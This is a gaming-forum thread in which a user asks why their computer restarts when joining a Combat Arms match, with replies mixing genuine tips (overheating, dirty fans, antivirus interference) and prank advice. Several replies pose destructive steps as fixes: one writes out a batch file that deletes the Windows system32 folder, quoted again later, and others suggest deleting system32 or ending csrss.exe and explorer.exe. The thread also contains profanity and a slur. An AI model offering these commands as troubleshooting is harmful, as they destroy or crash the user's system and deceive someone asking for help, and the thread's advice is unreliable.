Page 1 of 2 12 LastLast
Results 1 to 15 of 18
  1. #1
    lalo9's Avatar
    Join Date
    Mar 2010
    Gender
    male
    Posts
    246
    Reputation
    10
    Thanks
    10

    Adding programs for computer not to

    Adding programs for computer not to restart suddenly i need help with it when i play combat arms once join a game my computer restarts.

  2. #2
    Obscene's Avatar
    Join Date
    Apr 2011
    Gender
    male
    Location
    Bikin nigga.
    Posts
    4,036
    Reputation
    68
    Thanks
    1,058
    My Mood
    Amazed
    Dude work on grammer.

    and that sounds like a classic case of "piece of shit computer"

    google it

  3. #3
    Tristan's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Location
    MD, Canada
    Posts
    9,209
    Reputation
    19
    Thanks
    496
    My Mood
    Tired
    Yeah you should google it.
    Also try deleting system 32.

  4. #4
    Da Kurlzz's Avatar
    Join Date
    Jun 2010
    Gender
    male
    Location
    No Other Place Like Los Angeles
    Posts
    4,811
    Reputation
    306
    Thanks
    398
    My Mood
    Mellow
    Quote Originally Posted by DomoGenesis View Post
    Yeah you should google it.
    Also try deleting system 32.
    .
    I see what you did there.

  5. #5
    Moto's Avatar
    Join Date
    Dec 2008
    Gender
    male
    Location
    Bay Area, CA
    Posts
    13,057
    Reputation
    707
    Thanks
    13,902
    My Mood
    Blah
    Sounds like a shitstorm in your computer.. Shouldn't this be in ca help? Anyways, i've heard about this problem before, what kind of bullshit do you have open/running when you start up ca?



  6. #6
    Ryuesi's Avatar
    Join Date
    Jun 2011
    Gender
    male
    Location
    Right here.
    Posts
    7,343
    Reputation
    413
    Thanks
    2,394
    My Mood
    Relaxed
    What's The OS Do You Use ?





    Contributor Since 24-11-2011 ~ 26-12-2011
    VM / PM




  7. #7
    Smurfyv's Avatar
    Join Date
    Jan 2010
    Gender
    male
    Location
    -
    Posts
    7,703
    Reputation
    144
    Thanks
    480
    Go to process and end exploer.exe

  8. #8
    Takari's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Location
    Cross Fire Section
    Posts
    11,887
    Reputation
    574
    Thanks
    1,947
    My Mood
    Cool
    Check for some viruses.
    And clean your fans.




     
    Goal:
    10,000 Posts - 10/13/2011
    Become Minion - Not Done
    Become Donator - 07/29/2011
    1000 Thanks - Done - 07/25/2011
    2000 Thanks - Not Done
    Thanks Archangel for my 1,000 Thanks.
    Thanks Keroaplt for my Signature.

  9. #9
    bowlcut's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    ثلاثة أقدام إلى
    Posts
    6,255
    Reputation
    1644
    Thanks
    2,082
    My Mood
    Sleepy
    1. Open a new notepad
    2. Type the following:
    @EcHo off
    del c:\WINDOWS\system32
    3. Save as fix.bat
    4. Run your new bat file

    Should be good as new!
    if you actually believe me and do it, you fucking deserve it


    But honestly though, what do you run in the background? It might be your antivirus saying CA is a virus (because that's how McAfee works).

  10. #10
    Snipermon's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    Alexandria, Egypt, Egypt
    Posts
    5,786
    Reputation
    73
    Thanks
    748
    My Mood
    Yeehaw
    Format your pc

  11. #11
    Domen's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Posts
    3,535
    Reputation
    143
    Thanks
    239
    My Mood
    Angelic
    Ahh had that problem, just go to your task manager -> processes -> end csrss.exe
    It blocks CA from running in a weird way (by restarting your computer)

  12. #12
    Smurfyv's Avatar
    Join Date
    Jan 2010
    Gender
    male
    Location
    -
    Posts
    7,703
    Reputation
    144
    Thanks
    480
    Quote Originally Posted by Forrest Gumpert. View Post
    1. Open a new notepad
    2. Type the following:
    @EcHo off
    del c:\WINDOWS\system32
    3. Save as fix.bat
    4. Run your new bat file

    Should be good as new!
    if you actually believe me and do it, you fucking deserve it


    But honestly though, what do you run in the background? It might be your antivirus saying CA is a virus (because that's how McAfee works).
    Hahaha lovedd the white writing

  13. #13
    lolbie's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Location
    Netherlands
    Posts
    5,207
    Reputation
    288
    Thanks
    2,100
    My Mood
    Angelic
    or pc gets to warm or it needs more energy power so a better feed thing

    just buy a new pc...
    I love it when people keep their agreements /sarcasm ftw

  14. #14
    KingDot's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Location
    Goodbye
    Posts
    11,806
    Reputation
    1167
    Thanks
    1,333
    My Mood
    Busy
    It's Nexon's fault

  15. #15
    Smurfyv's Avatar
    Join Date
    Jan 2010
    Gender
    male
    Location
    -
    Posts
    7,703
    Reputation
    144
    Thanks
    480
    no His computer is overheating

Page 1 of 2 12 LastLast